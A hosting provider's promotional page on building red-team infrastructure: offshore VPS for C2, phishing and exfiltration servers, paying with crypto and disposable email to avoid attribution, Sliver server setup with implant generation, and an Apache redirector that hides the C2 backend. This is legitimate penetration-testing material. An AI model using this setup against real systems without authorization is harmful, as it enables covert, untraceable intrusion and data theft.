Red Team Infrastructure VPS - Offshore Pentesting and C2 Hosting

Red team VPS infrastructure needs: 1. Clean IP reputation: IP must not be on threat intelligence blocklists before the engagement. Fresh VPS IPs are clean. Verify with VirusTotal IP lookup and AbuseIPDB before starting an engagement. 2. Geographic separation: The C2 server should be in a different country from the assessment team and preferably from the target. Iceland VPS provides clear separation for most engagements. 3. Compartmentalization: Different VPS for different engagement functions - C2 server, phishing landing pages, payload staging, exfiltration. If one server is identified and blocked, others continue. 4. Clean provisioning: VPS registered with disposable email and cryptocurrency payment leaves minimal trail. Important for exercises where attribution isolation is required. 5. Rapid deployment: Anubiz Host provides instant VPS provisioning. For engagements that need infrastructure set up quickly.

For authorized red team engagements: Sliver (open source C2): ```bash # Download Sliver server wget https://github.com/BishopFox/sliver/releases/download/v1.5.41/sliver-server_linux chmod +x sliver-server_linux ./sliver-server_linux # In Sliver console: # https # generate --http YOUR_VPS_IP --save implant.exe ``` HTTPS listener on port 443 using a legitimate TLS certificate (Let's Encrypt) makes C2 traffic blend with normal HTTPS traffic. Category redirect: configure a redirector VPS that forwards C2 traffic to your actual Sliver server, providing an additional layer against blocklist identification. Redirector setup (Apache): ```apache # Apache .htaccess on redirector VPS: RewriteEngine On RewriteCond %{REQUEST_URI} ^/YOUR_C2_PATH [NC] RewriteRule ^(.*)$ http://YOUR_BACKEND_VPS_IP$1 [P,L] ``` All official red team tools including Cobalt Strike and Sliver are legitimate software requiring authorization from target organizations before use.